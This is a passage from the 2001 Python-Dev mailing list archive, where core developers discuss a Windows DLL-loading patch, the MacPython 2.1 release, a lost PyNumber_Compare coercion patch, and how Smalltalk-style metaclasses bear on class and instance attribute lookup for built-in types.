From MarkH@ActiveState.com Tue May 1 01:42:19 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Tue, 1 May 2001 10:42:19 +1000 Subject: [Python-Dev] Importing extensions on Windows 95 In-Reply-To: <3AED7248.B7386B83@lemburg.com> Message-ID: > Here's a stab at a patch. Could you review it and test it ? I > don't have enough knowledge of win32 for this... I think we can drop the getcwd call here completely. I prefer the patch below. Mark. Index: dynload_win.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v retrieving revision 2.7 diff -u -r2.7 dynload_win.c --- dynload_win.c 2000/10/05 10:54:45 2.7 +++ dynload_win.c 2001/05/01 00:36:40 @@ -163,24 +163,21 @@ #ifdef MS_WIN32 { - HINSTANCE hDLL; + HINSTANCE hDLL = NULL; char pathbuf[260]; - if (strchr(pathname, '\\') == NULL && - strchr(pathname, '/') == NULL) - { - /* Prefix bare filename with ".\" */ - char *p = pathbuf; - *p = '\0'; - _getcwd(pathbuf, sizeof pathbuf); - if (*p != '\0' && p[1] == ':') - p += 2; - sprintf(p, ".\\%-.255s", pathname); - pathname = pathbuf; - } - /* Look for dependent DLLs in directory of pathname first */ - /* XXX This call doesn't exist in Windows CE */ - hDLL = LoadLibraryEx(pathname, NULL, - LOAD_WITH_ALTERED_SEARCH_PATH); + LPTSTR dummy; + /* We use LoadLibraryEx so Windows looks for dependent DLLs + in directory of pathname first. However, Windows95 + can sometimes not work correctly unless the absolute + path is used. If GetFullPathName() fails, the LoadLibrary + will certainly fail too, so use its error code */ + if (GetFullPathName(pathname, + sizeof(pathbuf), + pathbuf, + &dummy)) + /* XXX This call doesn't exist in Windows CE */ + hDLL = LoadLibraryEx(pathname, NULL, + LOAD_WITH_ALTERED_SEARCH_PATH); if (hDLL==NULL){ char errBuf[256]; unsigned int errorCode; From thomas@xs4all.net Tue May 1 09:07:48 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 1 May 2001 10:07:48 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199 In-Reply-To: ; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700 References: Message-ID: <20010501100748.M16486@xs4all.nl> On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Python > In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python > > Modified Files: > bltinmodule.c > Log Message: > Fix buglet reported on c.l.py: map(fnc, file.xreadlines()) blows up. > Also a 2.1 bugfix candidate (am I supposed to do something with those?). No, not really. You can do me a favor by writing halfway decent checkin messages (no complaints there) and keep your fingers off the 'fix whitespace' button :) I keep a close eye on the checkins as they happen, and save away those that might need to be checked into the 2.1.1 branch. I'll go over them with a fine tooth comb when I'm approaching critical release mass :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Tue May 1 11:30:57 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 12:30:57 +0200 Subject: [Python-Dev] Importing extensions on Windows 95 References: Message-ID: <3AEE9061.32239814@lemburg.com> Mark Hammond wrote: > > > Here's a stab at a patch. Could you review it and test it ? I > > don't have enough knowledge of win32 for this... > > I think we can drop the getcwd call here completely. > > I prefer the patch below. If this works as expected, please check in the patch. (Note that I have not tested the patch I posted -- I've never used VC++ for anything else than compiling C extensions and GMP.) > Mark. > > Index: dynload_win.c > =================================================================== > RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v > retrieving revision 2.7 > diff -u -r2.7 dynload_win.c > --- dynload_win.c 2000/10/05 10:54:45 2.7 > +++ dynload_win.c 2001/05/01 00:36:40 > @@ -163,24 +163,21 @@ > > #ifdef MS_WIN32 > { > - HINSTANCE hDLL; > + HINSTANCE hDLL = NULL; > char pathbuf[260]; > - if (strchr(pathname, '\\') == NULL && > - strchr(pathname, '/') == NULL) > - { > - /* Prefix bare filename with ".\" */ > - char *p = pathbuf; > - *p = '\0'; > - _getcwd(pathbuf, sizeof pathbuf); > - if (*p != '\0' && p[1] == ':') > - p += 2; > - sprintf(p, ".\\%-.255s", pathname); > - pathname = pathbuf; > - } > - /* Look for dependent DLLs in directory of pathname first */ > - /* XXX This call doesn't exist in Windows CE */ > - hDLL = LoadLibraryEx(pathname, NULL, > - LOAD_WITH_ALTERED_SEARCH_PATH); > + LPTSTR dummy; > + /* We use LoadLibraryEx so Windows looks for dependent DLLs > + in directory of pathname first. However, Windows95 > + can sometimes not work correctly unless the absolute > + path is used. If GetFullPathName() fails, the LoadLibrary > + will certainly fail too, so use its error code */ > + if (GetFullPathName(pathname, > + sizeof(pathbuf), > + pathbuf, > + &dummy)) > + /* XXX This call doesn't exist in Windows CE */ > + hDLL = LoadLibraryEx(pathname, NULL, > + LOAD_WITH_ALTERED_SEARCH_PATH); > if (hDLL==NULL){ > char errBuf[256]; > unsigned int errorCode; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Tue May 1 22:22:11 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 23:22:11 +0200 Subject: [Python-Dev] Coercion and comparison of numbers Message-ID: <3AEF2903.79308F55@lemburg.com> I just received a bug report for mx.Number which revealed a probelm with the comparison code in Python 2.1. Looking at the code it seems that one of my original coercion patches did not make it into the core. I added a new API PyNumber_Compare() knows about the new coercion mechanism and should be called for numbers instead of trying coercion in PyObject_Compare(). Was this part of the coercion patch left out on purpose or a simple oversight ? I hope the latter... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack@oratrix.nl Tue May 1 22:23:59 2001 From: jack@oratrix.nl (Jack Jansen) Date: Tue, 1 May 2001 23:23:59 +0200 (MET DST) Subject: [Python-Dev] MacPython 2.1 released Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl> MacPython 2.1 is available for download. Get it via http://www.cwi.nl/~jack/macpython.html . Python is a high-level programming language that is suitable for simple scripting tasks as well as writing large applications. MacPython offers alot of Mac-specific extensions, including access to all major MacOS Toolbox modules (QuickDraw, QuickTime, AppleScript and many more), an Integrated Development Environment (in Python!), frameworks for windowing applications, unix-compatible cgi-scripting, image-manipulation libraries, numerical libraries, tk-based machine independent windowing and lots more. It also uniquely among Pythons allows you to create fully selfcontained (and, hence, distributable) applications without needing a C compiler or anything. New in this version: - A choice of Carbon or Classic runtime, so runs on anything between MacOS 8.1 and MacOS X - Distutils support for easy installation of extension packages - BBedit language plugin - All the platform-independent Python 2.1 mods - New version of Numeric - Lots of bug fixes - Choice of normal and active installer Please send feedback on this release to pythonmac-sig@python.org, where all the MacPythoneers hang out. Enjoy, -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From guido@digicool.com Wed May 2 01:52:29 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 19:52:29 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of how metaclasses work in Smalltalk. He should know, since he invented them! :-) I include it below, with his permission. While implementing more class-like behavior for built-in types in the experimental descr-branch in the 2.2 CVS tree, I've noticed problems caused by Python's collapsing of class attributes and instance attributes. For example, suppose d is a dictionary. My experimental changes make d.__class__ return DictType (from the types module). (DictType.__class__ is TypeType, by the way.) I also added special methods. For example, d.__repr__() now returns repr(d). I am preparing for subclassing of built-in types, so I will eventually be able to derive a class MyDictType from DictType, as follows: class MyDictType(DictType): ... Now comes the fun part. Suppose MyDictType wants to define its own repr(): class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) But, (surprise, surprise!), DictType itself also has a __repr__() method: it returns the string "". So the above code would fail: DictType.__repr__() returns repr(DictType), and DictType.__repr__(self) raises an argument count error. The correct __repr__ method for dictionary objects can be found as DictType.__dict__['__repr__'], but that looks hideous! What to do? Pragmatically, I can make DictType.__repr__ return DictType.__dict__['__repr__'], and all will be well in this example. But we have to tread carefully here: DictType.__class__ is TypeType, but DictType.__dict__['__class__'] is a descriptor for the __class__ attribute on dictionary objects. The best rule I can think of so far is that DictType.__dict__ gives the *true* set of attribute descriptors for dictionary objects, and is thus similar to Smalltalks's class.methodDict that Jim describes below. DictType.foo is a shortcut that can resolve to either DictType.__dict__['foo'] or to an attribute (maybe a method) of DictType described in TypeType.__dict__['foo'], whichever is defined. If both are defined, I propose the following, clumsy but backwards compatible rule: if DictType.__dict__['foo'] describes a method, it wins. Otherwise, TypeType.__dict__['foo'] wins. Sigh. --Guido van Rossum (home page: http://www.python.org/~guido/) ------------------------- Jim Althoff's message --------------------------- Hi Guido, I was reading the discussion on class methods in the python-dev archive and noticed your question about how Smalltalk determines the difference between instance methods and class methods. I have some info on this which I can't post to python-dev, not being a member; but I thought you might be interested in it anyway. It turns out that I am the one that devised metaclasses in Smalltalk-80. (On the other hand, I haven't looked at any Smalltalk implementation code in a long time so this is merely a description of how it all started.) Basically (I think) Smalltalk doesn't have the ambiguity you mention for instance methods versus class methods (as Python would) because Smalltalk doesn't do method lookup the same as Python does. To illustrate, suppose you have object.method() (using Python-style syntax) The Smalltalk method lookup is as follows: o find the class that object is an instance of -- this resulting thing is a "class object" (a first-class object, same as in Python) o since class is a "class object" one of its fields will be a dict of methods -- let's call it class.methodDict o find method in class.methodDict o if found, execute method on object o if not, do the same thing traversing the (single inheritance) superclass chain (follow class.superClass) I believe Python works roughly as follows (Just testing my own understanding here -- correct me if I don't get it right): o convert (conceptually at least) object.method() into object. __class__.method(object) o find a _function_ corresponding to method in object.__class__.__dict__ o if found, execute the found function (with object bound as the first arg to function) o if not, traverse the (multiple inheritance) superclass chain (depth first) I think the key difference is that Python treats object.method() the same as it treats object.__class__.method(object). Smalltalk doesn't do this. In Smalltalk, object.__class__.method(object) would mean: o consider object.__class__ to be an "object" like any other "object" in Smalltalk (which it is) o get the "class object" of object.__class__ , namely object. __class__.class__ o find method in object.__class__.__class__.methodDict o if found, execute the method on object.__class__ o if not, do the same thing traversing the (single inheritance) superclass chain (follow object.__class__.__class__.superClass) In other words, it exactly the same lookup mechanism. So there is no ambiguity. To summarize, in Smalltalk: o instance methods (for instances that are not "class objects") are specified by: instance.instanceMethod() o class methods are specified by: class.classMethod() o both of these are just object.objectMethod() since classes are objects and the method lookup mechanism is no different from that of any other kind of object. A concrete example: If I have a class Date in Smalltalk and an instance of it referenced by variable, d. I would do: o d.followingDate() for an instance method, and o Date.currentDate() for a class method I think this is a nice, conceptually simple model. Things get interesting, though, when you start to consider how the mechanism of class. __class__ -- which is the thing that makes class methods no different than instance methods -- actually works. And this leads to metaclasses in Smalltalk. Here's a rough sketch of how metaclasses work: Standard principles of Smalltalk: o everything is an object (first-class) o every object is an instance of a class o a class inherits (single-inheritance) from its superclass (except the root class Object, which has no superclass) o methods can be invoked on a object. All such methods are defined as part of the object's class definition (or a class going up the superclass chain) Because of the first 2 principles above: o every class is an object (because everything is an object) o every class is, itself, an instance of some class (because every object is an instance of a class) Originally in Smalltalk-76, there was one metaclass, Class. All classes (class objects) were instances of Class. Class was an instance of itself. Class had methods defined for it just like all classes did. In particular, it had a method "new" -- this being the method that creates instances of classes. So suppose you had class Rectangle. Rectangle is an instance of Class (hence it is a class object). If you wanted to create an instance of Rectangle, you would do: myRect = Rectangle.new(). This would mean: "find the 'new' method in the definition of Rectangle's class (Class) and invoke it on Rectangle (which is a class object). The result is a Rectangle instance which is assigned to the variable myRect. The Rectangle class object held data (state -- same rules as any other kind of object) -- such as number and name of fields its instances would have, a dictionary of methods for its instances, etc. So the "new" method in Class would have access to all the info it needed to create a Rectangle instance (as opposed to a Point instance, for example). The limitation with this scheme was that all classes had to share exactly the same methods, namely all the methods defined in Class. The method "new" was one of these methods along with lots of "reflection-type" methods for class creation, modification, and inspection. But if you wanted an "application-oriented" class method -- like Date.currentDate() -- you couldn't do that because then the method "currentDate" would be shared amongst all class objects (instances of Class) and wouldn't make any sense (e.g., Rectangle.currentDate()). In Smalltalk-80 I added a more flexible mechanism which we called metaclasses (we hadn't used that terminology previously for the single Class although it was a "metaclass"). The thing that everyone in the Smalltalk development team liked about the new metaclass mechanism at the time was that it didn't require any new basic principles for Smalltalk. It was all done using the same basic principles of Smalltalk listed above. The idea was to use subclassing to allow for different methods for different instances of Class. A "metaclass" simply became a subclass of Class. Each class object then ended up being a singleton instance (although the "singleton-ness" was not mandatory) of a metaclass (i.e., a subclass of Class). So class objects were no longer _all_ instances of the _same_ class (Class). Each was an instance of a corresponding subclass of Class -- that is to say, an instance of a metaclass. The Smalltalk-80 class hierarchy looked like the following: (This is actually a simplification. The actually hierarchy has a little more factoring and I changed the names for more clarity). First a digression on some terminology: o a class is an object that can be instantiated o a metaclass is a class and one such that when it is instantiated, the instanced is itself a class o a plain-object is one that cannot be instantiated (I'm just making this term up). o a plain-class is one that is a class but is not a metaclass (making this up, too). In the list below, indentation indicates class hieararchy (superclass -- subclass) plain-class ---------------- o Class o Object isInstanceOf o ObjectMetaClass isInstanceOf MetaClass o Class isInstanceOf o ClassMetaClass isInstanceOf MetaClass o MetaClass isInstanceOf o MetaClassMetaClass isInstanceOf MetaClass . . . o Rectangle isInstanceOf o RectangleMetaClass isInstanceOf MetaClass o SpecializedRectangle isInstanceOf o SpecializedRectangleMetaClass isInstanceOf MetaClass All "metaclasses" are instances of MetaClass. All "plain-classes" (those that are not "metaclasses") are instances of a "metaclass". Because of this there are parallel class hierarchies between "plain-classes" and their corresponding "metaclasses". Note that MetaClass is a "plain-class" and not a "metaclass". Also note that MetaClass (being a "plain-class") is an instance of its corresponding "metaclass" MetaClassMetaClass. And MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass _is_ a "metaclass"). The MetaClass / MetaClassMetaClass class/instance relationship is circular. An example. If you want a Rectangle class you first make a metaclass for it, RectangleMetaClass -- actually, the system does this for you automatically as part of the class creation method implementation (when you define the class Rectangle, for example). RectangleMetaClass is an instance of MetaClass so all the methods defined in MetaClass are available to it. RectangleMetaClass can also define its own methods now (because it is a class) which would be invoked on any (typically one) instance of RectangleMetaClass, which in this case is going to be class Rectangle. You then make your Rectangle class by making an instance of RectangleMetaClass (conceptually doing: Rectangle = RectangleMetaClass.new() ). Now you can make instances of Rectangle, doing: myRect = Rectangle.new() as before. This is not so different from the Smalltalk-76 mechanism. The main advantage is that you now have a specific class, RectangleMetaClass, that can have methods specific to the class Rectangle (the instance of RectangleMetaClass). So you could define a method like "newFromPointToPoint" for example and then do: myRect = Rectangle.newFromPointToPoint(point1,point2). The meaning is the same as always: take the variable "Rectangle", find out what it is pointing to. It is pointing to an instance of the RectangleMetaClass. Find the method "newFromPointToPoint" as part of the definition of RectangleMetaClass (it being a class object). Invoke this method on the Rectangle class object -- which then creates a Rectangle instance. The same would go for the other example: Date.currentDate(). So the bottom line is (I think) that the Smalltalk method lookup mechanism doesn't have to resolve an ambiguity because all methods that get invoked on an object always come from the object's definition class (or superclass) and from no other place. Hope this helps, Jim From guido@digicool.com Wed May 2 02:29:28 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:29:28 -0500 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200." <3AEF2903.79308F55@lemburg.com> References: <3AEF2903.79308F55@lemburg.com> Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com> > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). > > Was this part of the coercion patch left out on purpose or > a simple oversight ? I hope the latter... Hard to say. I don't think I paid very close attention to your patch; Neil did, but I changed a lot of the code around coercions and comparisons in order to implement rich comparisons. So, several things may have happened: Neil lost it; Neil decided against it; or I ripped it out. Can you elucidate me regarding the issues? (If there's code, please quote it or link to a specific patch.) Since the concept of "number" is ill-defined at best, when exactly should PyNumber_Compare() be called? What is it supposed to do? Does it need a rich cousin? --Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Wed May 2 01:42:15 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 1 May 2001 17:42:15 -0700 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500 References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> Message-ID: <20010501174215.A9565@glacier.fnational.com> [MAL] > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). I remember the API. I don't remember what happened to it. Guido might have dropped it or I might have taken it out thinking the comparison issues would be sorted out by Guido. Why is a new API needed? Why can't PyObject_Compare() do the right thing (ie. not coerce new style numbers)? Neil From guido@digicool.com Wed May 2 02:55:59 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:55:59 -0500 Subject: [Python-Dev] Slight wart in __all__ In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000." References: Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com> > Would it make sense to a explicitly raise a more meaningful exception here > if __all__ doesnt contain strings? Definitely. Be my guest. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg@cosc.canterbury.ac.nz Wed May 2 02:22:47 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 13:22:47 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Guido: > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. Yeek! I think that's far too confusing a rule. I suppose it might do in the meantime, but we'd better have a long term solution in mind before going too far down this route. Ultimately it seems like we'll have to introduce a separate namespace for methods and default instance attributes, say __classdict__. Then lookup of x.foo would look first in x.__dict__, then x.__class__.__classdict__, etc up the inheritance chain. Then we'll have to resolve the ambiguity of the class.foo syntax. The bravest way would be simply to change the syntax for getting unbound methods. The most common use for these seems to be for calling inherited methods, so perhaps something like inherited MyBaseClass.foo(arg, ...) which would be equivalent to getmethod(MyBaseClass, 'foo')(self, arg, ...) where getmethod() is a new builtin like getattr() except that it looks in the __classdict__, and 'self' is really whatever the first argument of the containing method was. Now that we have __future__, would such a change be contemplatable? Or is it too radical to even think about? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From guido@digicool.com Wed May 2 03:48:43 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 21:48:43 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200." <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> > Guido: > > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. Greg Ewing: > Yeek! I think that's far too confusing a rule. I suppose > it might do in the meantime, but we'd better have a long > term solution in mind before going too far down this > route. I agree 100%. I had to do something quick to be able to make progress with my PEP 252 project, but it's a clear indication that there's a problem! > Ultimately it seems like we'll have to introduce a separate > namespace for methods and default instance attributes, > say __classdict__. Then lookup of x.foo would look > first in x.__dict__, then x.__class__.__classdict__, > etc up the inheritance chain. Except that sometimes you really do want x.__class__.__classdict__ to have priority (e.g. for "guarded" attributes). > Then we'll have to resolve the ambiguity of the class.foo > syntax. The bravest way would be simply to change the syntax > for getting unbound methods. Agreed again. > The most common use for these seems to be for calling > inherited methods, so perhaps something like > > inherited MyBaseClass.foo(arg, ...) > > which would be equivalent to > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > where getmethod() is a new builtin like getattr() > except that it looks in the __classdict__, and 'self' > is really whatever the first argument of the containing > method was. The second most common use is to reference class variables (e.g. imagine a class that keeps counters of how many instances have been created and deleted in C.initcount and C.delcount). But these should not have to change, since they really are class attributes. > Now that we have __future__, would such a change be contemplatable? > Or is it too radical to even think about? If we can find a way to spell "super.method", we should be ready for the future. I can't think of something right off the bat unfortunately. But the issue of backwards compatibility is a big one here: the idioms for calling base class methods and using class variables as defaults for instance variables are so common that we will have to support these for many future versions! (Two things I am not looking forward to: fixing all the Zope code that uses this, and telling the author of Programming Python, 2nd. ed.) --Guido van Rossum (home page: http://www.python.org/~guido/) From greg@cosc.canterbury.ac.nz Wed May 2 03:48:20 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 14:48:20 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Guido: > Except that sometimes you really do want x.__class__.__classdict__ to > have priority (e.g. for "guarded" attributes). What's a "guarded" attribute? > But the issue of backwards compatibility is a big one here I was thinking that, while this is still in the __future__, the __dict__ attribute would be a pseudo-dict that, by default, behaves like the union of the old __dict__ and the __classdict__. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From mal@lemburg.com Wed May 2 08:59:03 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 09:59:03 +0200 Subject: [Python-Dev] Coercion and comparison of numbers References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com> Message-ID: <3AEFBE47.A847C5D2@lemburg.com> Neil Schemenauer wrote: > > [MAL] > > I just received a bug report for mx.Number which revealed a > > probelm with the comparison code in Python 2.1. Looking at > > the code it seems that one of my original coercion patches > > did not make it into the core. I added a new API PyNumber_Compare() > > knows about the new coercion mechanism and should be called for > > numbers instead of trying coercion in PyObject_Compare(). > > I remember the API. I don't remember what happened to it. Guido > might have dropped it or I might have taken it out thinking the > comparison issues would be sorted out by Guido. Good; so there's a chance for getting it back in :-) > Why is a new API needed? Why can't PyObject_Compare() do the > right thing (ie. not coerce new style numbers)? I think the reason for implementing number compares as separate API was to simply shift out code from PyObject_Compare() into a new function, not so much motivated by some higher level need to do number compares. [Guido] > > Was this part of the coercion patch left out on purpose or > > a simple oversight ? I hope the latter... > > Hard to say. I don't think I paid very close attention to your patch; > Neil did, but I changed a lot of the code around coercions and > comparisons in order to implement rich comparisons. So, several > things may have happened: Neil lost it; Neil decided against it; or I > ripped it out. > > Can you elucidate me regarding the issues? (If there's code, please > quote it or link to a specific patch.) Since the concept of "number" > is ill-defined at best, when exactly should PyNumber_Compare() be > called? What is it supposed to do? Does it need a rich cousin? The reasoning is simple: the coercion patches basically pass control over coercion down to the APIs in question and thus provide the type with more information to choose from. This is currently implemented in 2.1 for all number methods, but not for number comparisons which do have the same problems with centralized coercion as e.g. __add__ or other binary operators. Here's part of the original patch: --- Include/orig/abstract.h Wed May 13 00:28:58 1998 +++ Include/abstract.h Thu May 21 12:31:55 1998 @@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx This function always succeeds. */ - PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); + PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2)); + + /* + Returns the result of comparing o1 and o2, or null on failure. + This is the equivalent of the Python expression: cmp(o1,o2). + */ + + PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); /* Returns the result of adding o1 and o2, or null on failure. This is the equivalent of the Python expression: o1+o2. [...] } +/* Emulate old method for comparing numeric types using coercion and + tp_compare. If coercion doesn't work, we use the type names as + comparison basis (like PyObject_Compare() does too). */ + +static PyObject * +_PyNumber_OldstyleCompare(PyObject *v, + PyObject *w) +{ + int err; + + DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + err = PyNumber_CoerceEx(&v, &w); + if (err < 0) + return NULL; + else if (err == 0 && v->ob_type->tp_compare) { + int cmp; + + cmp = (*v->ob_type->tp_compare)(v, w); + /* XXX Test for errors ? Looks like C types cannot raise + exceptions in the compare slot... */ + Py_DECREF(v); + Py_DECREF(w); + DPRINTF(" compare slot returned: %i",cmp); + return PyInt_FromLong(cmp); + } + DPRINTF(" using type names for comparison\n"); + return PyInt_FromLong(strcmp(v->ob_type->tp_name, + w->ob_type->tp_name)); +} + +PyObject * +PyNumber_Compare(v, w) + PyObject *v, *w; +{ + DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + BINOP("__cmp__", "__rcmp__", PyNumber_Compare); + return _PyNumber_BinaryOperation(v,w, + NB_SLOT(nb_cmp), + "cmp()"); +} + [...] +static PyObject * +_PyNumber_BinaryOperation(PyObject *v, + PyObject *w, + const int op_slot, + const char *operation) +{ + PyNumberMethods *mv, *mw; + register PyObject *x; + register binaryfunc *slot; + int c; ... + /* When using old coercion, make sure that the requested slot + is available on old style numbers or use an emulation. */ + if (op_slot > NB_SLOT(nb_hex)) { + + /* Emulation hooks: */ + if (op_slot == NB_SLOT(nb_cmp)) + return _PyNumber_OldstyleCompare(v,w); + + goto badOperands; + } [...] int PyObject_Compare(v, w) PyObject *v, *w; { PyTypeObject *tp; @@ -291,27 +294,30 @@ PyObject_Compare(v, w) Py_DECREF(res); PyErr_SetString(PyExc_TypeError, "comparison did not return an int"); return -1; } - c = PyInt_AsLong(res); + c = PyInt_AS_LONG(res); Py_DECREF(res); return (c < 0) ? -1 : (c > 0) ? 1 : 0; } if ((tp = v->ob_type) != w->ob_type) { - if (tp->tp_as_number != NULL && - w->ob_type->tp_as_number != NULL) { - int err; - err = PyNumber_CoerceEx(&v, &w); - if (err < 0) + if (tp->tp_as_number != NULL || + w->ob_type->tp_as_number != NULL) { + PyObject *res; + int c; + res = PyNumber_Compare(v,w); + if (res == NULL) return -1; - else if (err == 0) { - int cmp = (*v->ob_type->tp_compare)(v, w); - Py_DECREF(v); - Py_DECREF(w); - return cmp; + if (!PyInt_Check(res)) { + PyErr_SetString(PyExc_TypeError, + "comparison did not return an int"); + return -1; } + c = PyInt_AS_LONG(res); + Py_DECREF(res); + return (c < 0) ? -1 : (c > 0) ? 1 : 0; } return strcmp(tp->tp_name, w->ob_type->tp_name); } if (tp->tp_compare == NULL) return (v < w) ? -1 : 1; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Wed May 2 10:09:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 11:09:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <3AEFCEBD.2E5979C9@lemburg.com> Guido van Rossum wrote: > > While implementing more class-like behavior for built-in types in the > experimental descr-branch in the 2.2 CVS tree, I've noticed problems > caused by Python's collapsing of class attributes and instance > attributes. > > For example, suppose d is a dictionary. My experimental changes make > d.__class__ return DictType (from the types module). > (DictType.__class__ is TypeType, by the way.) I also added special > methods. For example, d.__repr__() now returns repr(d). I am > preparing for subclassing of built-in types, so I will eventually be > able to derive a class MyDictType from DictType, as follows: > > class MyDictType(DictType): > ... > > Now comes the fun part. Suppose MyDictType wants to define its own > repr(): > > class MyDictType(DictType): > def __repr__(self): > return "MyDictType(%s)" % DictType.__repr__(self) > > But, (surprise, surprise!), DictType itself also has a __repr__() > method: it returns the string "". > > So the above code would fail: DictType.__repr__() returns > repr(DictType), and DictType.__repr__(self) raises an argument count > error. The correct __repr__ method for dictionary objects can be > found as DictType.__dict__['__repr__'], but that looks hideous! > > What to do? Pragmatically, I can make DictType.__repr__ return > DictType.__dict__['__repr__'], and all will be well in this example. > But we have to tread carefully here: DictType.__class__ is TypeType, > but DictType.__dict__['__class__'] is a descriptor for the __class__ > attribute on dictionary objects. > > The best rule I can think of so far is that DictType.__dict__ gives > the *true* set of attribute descriptors for dictionary objects, and is > thus similar to Smalltalks's class.methodDict that Jim describes > below. DictType.foo is a shortcut that can resolve to either > DictType.__dict__['foo'] or to an attribute (maybe a method) of > DictType described in TypeType.__dict__['foo'], whichever is defined. > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. I'm not sure I can follow you here: DictType.__repr__ is the representation method of the dictionary and not inherited from TypeType, so there should be no problem. The problem with 